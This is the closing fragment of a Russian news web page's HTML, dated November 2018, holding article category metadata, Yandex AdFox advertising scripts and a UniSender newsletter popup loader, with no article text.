      article_categories: ["ПРОИСШЕСТВИЯ"],
      article_subcategories: [],
      article_type: "Новость",
      article_publication_date: "Thu, 08 Nov 2018 04:57:33 GMT"});</script>
    </div></div></div></div></div><div id='adfox_15084234614097607'></div>
<script>window.Ya.adfoxCode.create({
ownerId: 249448,containerId: 'adfox_15084234614097607',
params: {pp: 'h',ps: 'cnac',p2: 'frbz'}});</script><!--Тип баннера: article_region-->
<!--Расположение: <середина страницы>-->
<div id='adfox_150850929537028801'></div>
<script>window.Ya.adfoxCode.create({ownerId: 249448,
containerId: 'adfox_150850929537028801',params: {
pp: 'h',ps: 'cnac',p2: 'fspr'}});</script><!--Start of UniSender PopUp Form script-->
  <script type="text/javascript" src="//popup-static.unisender.com/service/loader.js?c=5067"
  id="unisender-popup-forms"></script>
<!--End of UniSender PopUp Form script--></body></html>